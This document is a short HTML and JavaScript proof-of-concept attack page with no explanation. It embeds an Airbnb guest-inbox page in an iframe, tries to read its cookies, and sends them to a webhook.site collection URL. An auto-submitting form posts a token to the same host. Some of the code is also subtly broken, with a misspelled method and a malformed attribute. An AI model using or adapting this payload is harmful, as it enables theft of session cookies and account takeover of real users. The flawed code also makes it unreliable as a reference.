<script>
var token;
function readframe1(){
  token = frame1.document.cookie;
  document.getElementById("csrf").token.value = token
  loadframe2();
}
function loadframe2(){
  var test = document.getElementbyId("frame2");
  test.src = "https://webhook.site/33c386d8-c406-478e-a9c9-31fc56a8f90f?token="+token;
}
</script>

<iframe id="frame1" name="frame1" src="http://www.airbnb.co.id/guest/inbox?tab=&hq055oy4jh=1" onload="readframe1()" 
sandbox="allow-same-origin allow-scripts allow-forms allow-popups allow-top-navigation"
height="600" width="800"></iframe>

<iframe id="frame2" name="frame2" 
sandbox="allow-same-origin allow-scripts allow-forms allow-popups allow-top-navigation"
height="600" width="800"></iframe>
<body onload="document.forms[0].submit()">
<form id="bypass" name"bypass" method="POST" target="frame2" action="https://webhook.site/33c386d8-c406-478e-a9c9-31fc56a8f90f?submit" enctype="multipart/form-data">
  <input type="text" name="username" value="z">
  <input type="checkbox" name="status" checked="">        
  <input id="token" type="hidden" name="token" value="0000" />
  <input id="csrf" type="hidden" name="csrf"/>
  <button type="submit">Submit</button>
</form>
